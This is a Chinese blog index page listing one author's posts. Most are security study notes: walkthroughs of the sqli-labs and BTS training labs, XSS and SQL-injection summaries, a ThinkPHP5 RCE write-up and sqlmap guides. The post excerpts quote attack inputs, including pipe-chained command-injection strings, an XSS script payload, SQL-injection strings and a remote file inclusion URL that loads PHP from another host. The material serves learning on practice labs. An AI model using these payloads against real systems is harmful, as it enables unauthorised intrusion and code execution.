自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

wkend的博客

学习记录

  • 博客(95)
  • 资源 (4)
  • 收藏
  • 关注

原创 命令行运行jar包出现原因: java.lang.NoClassDefFoundError: javafx/application/Application的解决方案

运行jar包出现原因: java.lang.NoClassDefFoundError: javafx/application/Application的解决方案

2022-08-27 13:03:43 9349 1

原创 PHP向mysql数据库插入中文显示乱码

乱码如下:解决方式查看数据库编码方式://查询show variables like 'character%';//设置set character_set_server = 'utf8';设置HTML页面编码<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />PHP文件编码设置//消息头部header("Content-Type:text/html; charset=utf-8")

2020-07-30 15:28:12 1480 3

原创 python pip 安装库权限问题解决记录

问题详情:解决方法:python3 -m pip install click --user

2020-04-28 15:31:16 1067

原创 IDEA 2019.3 配置jdbc连接驱动

0x01 测试环境windows 10 64bitMySQL 8.0IDEA 2019.3mysql-connector-java-8.0.180x02 下载连接器访问MySQL官网https://www.mysql.com/,点击download,如下:依次点击,进入下面页面,点击Connector/J项选择操作系统为Platform Independent,ZIP文...

2019-12-13 19:18:04 1939 1

原创 Windows环境python2、python3共存以及pip升级、安装依赖问题记录

0x01 测试环境windows 10python 38python 270x02 配置过程2.1 重命名下载,安装完成如下:进入Python27目录,建立python.exe副本,并重命名,结果如下图:同理,python38也一样,如下图:2.2 添加环境变量2.3 验证成功安装0x03 pip升级、安装依赖问题3.1 pip版本升级问题python[2...

2019-11-12 14:35:41 2111

转载 Mysql数据库渗透及漏洞利用总结

Mysql数据库渗透及漏洞利用总结Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总...

2019-04-18 15:17:23 2286 1

原创 ThinkPHP5远程命令执行漏洞

0x01 ThinkPHP简介ThinkPHP是一个基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布。从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,注重开发体验和易用性,为web应用开发提供了强有力的支持。0x02 漏洞简介(1)漏洞名称ThinkPHP5远程命令执行(2)漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安...

2019-01-02 10:24:40 10433 1

原创 CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现

0x01 了解本地文件包含LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。0x02 了解远程代码执行RCE(远程代码执行),远程...

2018-12-26 16:40:59 3209

原创 cookie注入

0x00 什么是cookie?cookie是当前识别用户,实现持久会话的最好的方式,有时也叫cookies,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。cookie最初是由网景公司开发的,现在所有的浏览器都支持。“Cookie”是小量信息,由网络服务器发送出来以存储在网络浏览器上,从而下次这位独一无二的访客又回到该网络服务器时,可从该浏览...

2018-11-08 13:13:08 2644

原创 BTS测试实验室 --- 文件包含、SSRF、点击劫持、无限制文件上传

0X00 文件包含1. 什么是“文件包含”?在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。文件包含分为本地文件包含和远程文件包含。2. 本地文件包含利用方式btslab只有本地文件包含,所以这里只演示本地文件包含的利用方式。注意这里的url包含了一个文件news.php我们在本地创建一个新的文件...

2018-11-03 16:49:03 1786

原创 BTS测试实验室 --- CSRF

0x00 什么是“CSRF”?以下介绍来自OWASP20130x01 “CSRF”的发现与防止0x02 攻击案例0x03 CSRF 1 — 更改信息以普通用户身份登入(这里我选择tom),进入修改个人信息修改页输入新信息,抓包得到修改页的请求url,注意这里的请求方式是GET接下来构造CSRF攻击,构造攻击页面,接下来已经登录的tom去访问攻击者构造的网站这时候t...

2018-11-03 10:58:00 1505

原创 BTS测试实验室 --- 安全配置错误和丢失的功能级别访问控制

什么是“安全配置错误”漏洞

2018-11-02 23:32:05 671

原创 BTS测试实验室 ---不安全的直接对象引用

0x00 什么是“不安全的直接对象引用”?浏览OWASP对该漏洞的说明下面是2013年OWASP对不安全的直接对象引用的说明:0x01 回到题目查看详细信息首先用普通用户登入,如tom用户查看tom用户的详细信息:注意url中的参数idhttp://127.0.0.1/btslab/myprofile.php?id=4改变该参数值,如http://127.0.0....

2018-11-02 21:58:04 711

原创 BTS测试实验室 --- xss攻略

ox00反射型挑战1payload:&amp;amp;lt;script&amp;amp;gt;alert('xss')&amp;amp;lt;/script&amp;amp;gt;挑战2通过尝试发现页面会发生变化,而且参数在url中可见且可控url:http://127.0.0.1/btslab/vulnerability/xss/xss2.php?clr=%23000&amp;amp;amp;Change=%E5%88%87%E6%8D%A2改变参数

2018-11-02 21:02:43 693

原创 BTS测试实验室--远程文件包含和服务器端注入攻略

远程文件包含构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php可以看到,远程包含的文件被解析执行了。下面来看看远程文件中的内容是什么?所以说,对于存在远程文件包含漏洞的情况,会造成任意代码被执行的危害。有关这个漏洞更多的实例或讲解,可...

2018-10-28 22:34:59 513

原创 centos 7+nginx无法访问php页面的问题记录

在这里做一下问题记录帖:问题截图:这里我的配置环境是:centos 7.5nginx 1.14.0php 7.2.10OK,下面说说解决办法:找到php-fpm执行文件,我的在目录/usr/local/php/sbin/下find / -name php-fpm进入到该目录下cd /usr/local/php/sbin/可以看到可执行文件php-fpm然后执行命令:...

2018-10-28 20:51:17 4089

原创 BTS测试实验室 --- 注入关 --- PHP对象注入

0x01 挑战1提到对象注入,首先就要了解对象的序列化与反序列化,所以对象注入漏洞也有人称作反序列化漏洞。有关序列化与反序列的内容,在这里做简单说明。序列化的参数类型表示说明String s:size:valueInteger i:valueBoolean b:valueNull NArray a:size:{key define;value define}Object ...

2018-10-28 15:20:24 357

原创 BTS测试实验室 --- 注入关攻略

0x00 命令注入payload:127.0.0.1 | ipconfig13||ipconfig127.0.0.1&amp;amp;ipconfig127.0.0.1&amp;amp;&amp;amp;ipconfig上面的方式主要是通过管道符让系统执行了命令。‘以下是常用的管道符:0x01 windows系列支持的管道符| 直接执行后面的语句|| 如果前面执行的语句出错,则执行后面的语句,前面的语...

2018-10-28 10:05:59 961

原创 BTS测试实验室 --- SQL注入关攻略

一. Sql注入1判断注入点:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1’如下图,报错,存在sql注入手工注入,(1)爆字段数:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 order by 4,页面返回正常http://127.0.0.1/b...

2018-10-25 23:19:21 697

原创 XSS小结

XSS是什么?XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。XSS会造成那些危害?攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...

2018-10-19 21:20:26 1477

原创 sqli-labs练习(十八、十九、二十、二十一)

按照正常思路,先是对username和password输入框进行测试,并没有找到注入点,页面上显示的ip地址也很奇怪,最会无奈查看了源代码,才发现了突破口。发现后台对uname和passwd有检查过滤函数check_input于是跟进check_input函数,发现对输入的参数进行了长度限制,纯数字过滤,特殊符号过滤到现在我们就可以看出,在uname和passwd出已经无法入手,,,,...

2018-10-14 00:05:39 1047

原创 端口扫描

0x01 端口扫描介绍端口扫描是指人为发送一组端口扫描消息,视图以此了解某台计算机的弱点,并了解其提供的计算机网络服务类型。端口最常用也是最强大的工具是nmap,在nmap的端口扫描方式中,所有的扫描方式都是以-s[x]的形式,若是ACK扫描则是-sA,若是UDP扫描则是-sU。0x02 端口状态nmap提供了6个端口状态,帮助我们了解目标。open此端口对外为开放状态closed...

2018-10-13 19:00:27 1776

原创 SQL 注入总结

0x01 什么是SQL注入sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。0x02 SQL注入的分类按变量类型分数字型字符型按HTTP提交方式分GET注入POST注入Cookie注入按注入方式分报错注入盲注布尔盲注时间盲注union注入编码问题宽字节注入0x03识别后台数据库1. 根据操作...

2018-10-10 21:08:57 2984

原创 AES内部加密原理

0x01 AES概述高级加密标准(Advanced Encryption Standard,缩写:AES),在密码学中又称Rijndael加密法,是美国联邦政府采用的一种区块加密标准。这个标准用来替代原先的DES,已经被多方分析且广为全世界所使用。经过五年的甄选流程,高级加密标准由美国国家标准与技术研究院(NIST)于2001年11月26日发布于FIPS PUB 197,并在2002年5月26日...

2018-10-08 19:24:46 1449

原创 python类定义(普通类属性、实例属性;普通类方法、类方法、静态方法)一遍过

#!/usr/bin/env python 3.7# -*- coding: utf-8 -*-# @Time : 2018/9/29 20:44# @Author : wkend# @File : demo1.py# @Software: PyCharm# 定义一个类,object表示People所继承的类,若People没有自定义要继承的类,统一用object,...

2018-09-29 23:02:37 1425 1

原创 解析漏洞总结

0x01 什么是解析漏洞?简单的说,解析漏洞就是web容器将其他格式的文件解析为可执行脚本语言,攻击者可以利用这个特征去执行一些攻击行为。oxo2 概述通常会出现解析漏洞的web容器有IIS 6.0、Nginx、Apache。0x03 IIS解析漏洞使用IIS6.0的服务器,一般是Windows server 2003,解析语言是asp,不能解析aspx语言。利用方式1. 目录解析...

2018-09-23 17:28:43 2303

原创 主动信息收集 --- 各层主机发现

二层主机发现主要利用的是arp协议,所以只能发现在同一个网段里的主机,不能路由,但是扫描速度快、可靠。0x01 arping命令探测某个主机用法arping [-f 收到第一个回复就停止] [-c 指定发送的数量] [-s 源地址] 目的地址实例arping -f 192.168.11.129arping 192.168.11.129 -c 1...

2018-09-16 22:10:11 1087

原创 sqlmap的使用 ---- 自带绕过脚本tamper

sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用–tamper参数对数据做修改来绕过waf等设备。0x01 命令如下sqlmap -u [url] --tamper [模块名]sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper下 目前sqlmap 1.2.9版本共有37...

2018-09-15 20:23:39 37978 2

原创 sqlmap的使用 ---- 进阶

1. –level 探测等级一共有5个等级,默认是1。 sqlmap使用的payload可以在xml\payloads中看到,也可以根据相应的格式添加自己的payload,5级包含的payload最多。 http cookie在2级时可以检测 HTTP user-Agent/Referer在3级时就会检测2. –is-dba 当前用户是否为管理员权限sqlmap -u "http...

2018-09-09 10:49:08 15084

原创 sqlmap的使用 ---- 入门

sqlmap是一个自动化的sql注入工具,其主要功能就是扫描、发现给定url的sql注入漏洞。1. 判断是否存在注入当url中存在两个参数时,要使用双引号sqlmap -u +rul2. 判断文本中的请求是否存在注入 利用工具burp suite抓包,保存为文件 sqlmap -r +http请求文本 3. 查询当前用户下的所有数据库sqlmap...

2018-09-07 21:14:06 3674

原创 渗透测试 ---- 信息收集

《web安全攻防–渗透测试实战指南》读书笔记1. 收集域名信息 1.1. Whois查询 1.2. 备案信息查询 2. 收集敏感信息 3. 收集子域名信息 4. 收集常用端口信息 5. 指纹识别 6. 查找真实IP 7. 收集敏感目录文件 8. 社会工程学一、收集域名信息1. Whois查询kali下的whois 在线who...

2018-09-06 21:00:11 2517 2

原创 win10系统MySQL 8.0的下载安装超详细教程

1. 下载地址:https://www.mysql.com/downloads/ 点击Windows,选择平台,下载MySQL Install 进入下载页, 点击Download之后进入下图,可以选择登录,也可以跳过直接下载,这里我们直接选择下载 得到下载完成的文件 2. 安装双击下载得到的文件开始安装,接受,next 选择第二项:Server ...

2018-09-02 15:20:01 40747 11

原创 sqli-labs练习(十七)--- POST-Update Query-Error Based-String

在用万能密码进行登录的时候发现,username处无法绕过对密码的检查,总是登录失败。猜测后台对uname参数的值有过滤。导致无法注入。使用正常方式进行登录,发现在前台可以修改用户的密码。 再次尝试,发现passwd出存在sql注入漏洞, payload:uname=admin&amp;amp;passwd=123'&amp;amp;submit=Submit,出现报错语句 于是在passwd出...

2018-07-28 09:27:29 446

原创 sqli-labs练习(十五、十六)

sqli-labs练习(十五)— POST-Bind-Boolean/time Based-Single quotes同样,使用万能密码即可登录成功,进过几次注入尝试发现是基于布尔型的盲注。 万能密码:123' or 1=1#,即可登录成功。基于布尔型的sql注入稍微麻烦,因为要不断的测试,根据页面的反应来猜测后台数据库信息。 下面直接放payload:uname=1' or (s...

2018-07-27 17:55:09 1433

原创 sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist

这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...

2018-07-26 16:31:12 421

原创 sqli-labs练习(十三)--- POST-Double Injection-Single quotes-String-with twist

payload:uname=123 or 1=1#&amp;amp;amp;passwd=111&amp;amp;amp;submit=Submit,登录失败payload:uname=123' or 1=1#&amp;amp;amp;passwd=111&amp;amp;amp;submit=Submit, 报错You have an error in your SQL syntax; check the manual that correspon...

2018-07-26 16:18:44 278

原创 sqli-labs练习(十二)--- POST-Error Based-Double quotes-String-with twist

通过万能密码发现是双引号的变形, 这里直接上payload,就不再讲测试的过程了, 爆数据库名和版本uname=123&amp;amp;quot;) union select database(),version()#&amp;amp;amp;amp;passwd=Dumb&amp;amp;amp;amp;submit=Submit其余操作请参考前面几关,大同小异。...

2018-07-25 19:57:52 297

原创 sqli-labs练习(十一)--- POST-Error Based-Single quotes-String

一般看到这种需要登录的可能第一反应就是使用暴力破解,但是这里我们主要讨论的是sql注入,所以爆破就不在这里讲了。发现需要登录,尝试使用万能密码登录, 万能密码的介绍:https://bbs.ichunqiu.com/thread-10851-1-1.htmlpayload:username=admin' or 1=1#,password=任意输入, 登录成功,同时得到了一个账号的用...

2018-07-25 19:29:39 325

原创 sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1, 通过几次尝试,可以发现,这是一个基于时间的盲注, payload:id=1' and sleep(5)%23,时间并没有延迟5秒,说明不是单引号的闭合 payload:id=1&quot; and sleep(5)%23,页面发生延迟,说明是双引号的闭合 payload:id=1&quot; and if(ascii(substr(database(),1,1))=...

2018-07-25 09:45:37 300

原创 sqli-labs练习(九)------GET-Blind-Time based-Single-Quotes

payload:id=1,回显结果:You are in........... payload:id=1'%23,回显结果:You are in........... payload:id=1&quot;%23,回显:You are in........... payload:id=1' and 1=1%23,回显:You are in........... payload:id...

2018-07-25 09:06:02 542

2018红帽线上MISC----OS_038c9291c8039792d1aad140f6664671.iso

2018红帽线上MISC(听说你们喜欢手工爆破)文件----OS_038c9291c8039792d1aad140f6664671.iso

2018-05-03

2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip

2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip

2018-05-03

sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)

该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈

2018-04-29

sqli-labs lesson8 python 脚本源代码(存在小bug)

该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)

2018-04-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除